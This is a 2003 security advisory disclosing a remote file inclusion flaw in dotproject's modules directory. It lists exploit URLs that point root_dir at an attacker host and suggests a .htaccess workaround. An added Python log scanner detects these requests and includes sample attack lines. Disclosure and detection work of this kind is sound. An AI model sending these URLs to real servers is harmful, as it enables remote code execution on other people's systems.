dotproject Remote Code Execution Vulnerability (By Mindwarper)
<------- ------->
----------------------
Vendor Information:
----------------------
Homepage : http://www.dotproject.net
Vendor : informed
Mailed advisory: 28/01/03
Vendor Response : None
----------------------
Affected Versions:
----------------------
dev20030121
----------------------
Vulnerability:
----------------------
dotproject is a PHP+MySQL beta-level, web-based project management and tracking tool
that dotmarketing started in Dec. 2000.
Inside the /modules/ directory, multiple files include classdefs/date.php through
$root_dir without defining $root_dir first. If register_globals is on, a remote
attacker can set $root_dir from the request and have the file loaded from a server
of their choosing.
Example code from modules/projects/addedit.php:
******
<?php
##
## Files modules: index page re-usable sub-table
##
require_once( "$root_dir/classdefs/date.php" );
$df = $AppUI->getPref('SHDATEFORMAT');
$tf = $AppUI->getPref('TIMEFORMAT');
******
As you can see, nothing sets $root_dir before require_once is called, so with
register_globals on an attacker may include remote files.
Example:
http://victim/dotproject/modules/files/index_table.php?root_dir=http://attacker
This also works on:
http://victim/dotproject/modules/projects/addedit.php?root_dir=http://attacker
http://victim/dotproject/modules/projects/view.php?root_dir=http://attacker
http://victim/dotproject/modules/projects/vw_files.php?root_dir=http://attacker
http://victim/dotproject/modules/tasks/addedit.php?root_dir=http://attacker
http://victim/dotproject/modules/tasks/viewgantt.php?root_dir=http://attacker
----------------------
Solution:
----------------------
Please check the vendor's website for new patches.
As a temporary solution, create a .htaccess file that contains 'Deny from all'.
Place it in the /modules/ directory and that should block remote users from accessing it.
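Added example (not part of the original advisory): a Python sketch that scans web
server access logs for the requests described above, i.e. a root_dir parameter
carrying a URL, sent to a PHP file under /modules/. The Apache common/combined log
format, the sample log lines and the host name attacker.example are assumptions
made for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Common/combined log format: client ... "METHOD target PROTO" status ...
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
# A value that starts with scheme:// would make require_once fetch remotely.
SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.-]*://', re.I)

def find_root_dir_injection(log_lines):
    """Return (client, path, root_dir value, status) for suspicious requests."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, target, status = m.groups()
        parts = urlsplit(target)
        path = unquote(parts.path)
        if "/modules/" not in path or not path.endswith(".php"):
            continue
        # parse_qsl percent-decodes names and values once, as PHP does.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            # PHP turns dots and spaces in parameter names into underscores.
            name = name.replace(".", "_").replace(" ", "_")
            if name == "root_dir" and SCHEME_RE.match(value):
                hits.append((client, path, value.strip(), int(status)))
    return hits

# Constructed sample log lines (documentation IPs, placeholder host names).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Feb/2003:10:00:00 +0000] "GET /dotproject/modules/'
    'projects/addedit.php?root_dir=http://attacker.example HTTP/1.0" 200 512',
    '203.0.113.7 - - [01/Feb/2003:10:00:05 +0000] "GET /dotproject/modules/'
    'tasks/viewgantt.php?root_dir=http%3A%2F%2Fattacker.example HTTP/1.0" 403 210',
    '198.51.100.9 - - [01/Feb/2003:10:01:00 +0000] "GET /dotproject/index.php'
    '?m=projects HTTP/1.0" 200 4096',
    '198.51.100.9 - - [01/Feb/2003:10:01:09 +0000] "GET /dotproject/modules/'
    'files/index_table.php HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for client, path, value, status in find_root_dir_injection(SAMPLE_LOG):
        print(f"{client} {status} {path} root_dir={value}")
```

A hit with status 403 is what the .htaccess workaround produces; a hit with
status 200 means the request was served and the host should be investigated.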
----------------------
Contact:
----------------------
Name: Mindwarper
Email: mindwarper (at) hush (dot) com
Website: http://mindlock.bestweb.net
<------- ------->